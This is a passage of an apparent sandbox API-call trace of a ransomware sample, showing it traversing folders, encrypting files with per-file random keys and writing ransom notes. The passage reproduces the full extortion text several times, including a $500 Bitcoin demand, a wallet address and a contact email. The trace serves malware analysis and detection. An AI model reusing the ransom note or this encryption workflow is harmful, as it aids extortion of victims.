lpString2="Program Files") returned -1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0065.950] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 100 [0065.950] StrStrIW (lpFirst="behavior.xml", lpSrch=".protected") returned 0x0 [0065.950] lstrcmpW (lpString1="behavior.xml", lpString2="RESTORE_FILES.txt") returned -1 [0065.950] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.950] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.951] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="Windows") returned -1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files") returned 1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files (x86)") returned 1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="$Recycle.bin") returned 1 [0065.951] lstrcmpiW (lpString1="watermark.png", lpString2="System Volume Information") returned 1 [0065.951] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 101 [0065.951] StrStrIW (lpFirst="watermark.png", lpSrch=".protected") returned 0x0 [0065.951] lstrcmpW (lpString1="watermark.png", lpString2="RESTORE_FILES.txt") returned 1 [0065.951] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.951] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.951] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.951] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.951] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.955] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt") returned 105 [0065.958] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.963] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.963] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.965] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.965] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.965] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.965] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.965] CloseHandle (hObject=0xd4) returned 1 [0065.965] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.965] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.965] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt") returned 66 [0065.965] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt" (normalized: 
"c:\\programdata\\microsoft\\device stage\\device\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.974] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.974] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.975] lstrlenA 
(lpString="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") returned 684 [0065.975] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.975] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.975] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0065.975] CloseHandle (hObject=0xb4) returned 1 [0065.975] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="Windows") returned -1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="Program Files") returned 1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="Program Files (x86)") returned 1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="$Recycle.bin") returned 1 [0065.975] lstrcmpiW (lpString1="Task", lpString2="System Volume Information") returned 1 [0065.975] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned 46 [0065.975] lstrcmpW (lpString1="Task", lpString2=".") returned 1 [0065.975] lstrcmpW (lpString1="Task", lpString2="..") returned 1 [0065.975] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*") returned 48 [0065.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.975] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0065.975] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.976] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.976] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.976] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.976] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\.") returned 48 [0065.976] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.976] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.976] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.976] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.976] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.976] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.976] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.976] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\..") returned 49 [0065.976] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.976] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.976] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Windows") returned -1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files") returned -1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files (x86)") returned -1 [0065.976] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="$Recycle.bin") returned 1 [0065.976] lstrcmpiW 
(lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="System Volume Information") returned -1 [0065.976] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 85 [0065.976] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2=".") returned 1 [0065.976] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="..") returned 1 [0065.976] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned 87 [0065.976] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0066.003] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.003] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.003] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.003] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.003] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.003] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\.") returned 87 [0066.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.003] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.003] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.003] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.003] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") 
returned 1 [0066.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.003] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\..") returned 88 [0066.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.003] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0066.003] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0066.003] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 91 [0066.003] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0066.003] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0066.003] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned 93 [0066.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0066.004] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.004] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.004] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.004] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0066.004] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.004] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\.") returned 93 [0066.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.004] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0066.004] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.004] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.004] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.004] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.004] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.004] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\..") returned 94 [0066.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.004] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0066.004] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0066.004] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 104 [0066.004] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0066.004] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0066.004] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0066.004] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0066.004] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.008] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0066.008] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0066.008] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt") returned 109 [0066.008] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0066.010] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.010] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0066.010] lstrlenA (lpString="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") returned 684 [0066.011] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0066.011] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.011] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0066.011] CloseHandle (hObject=0xd8) returned 1 [0066.011] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0066.011] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96 [0066.011] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0066.011] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.011] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device 
stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.011] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="Windows") returned -1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files") returned -1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files (x86)") returned -1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="$Recycle.bin") returned 1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="System Volume Information") returned -1 [0066.011] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96 [0066.012] StrStrIW (lpFirst="netfol.ico", lpSrch=".protected") returned 0x0 [0066.012] lstrcmpW (lpString1="netfol.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, 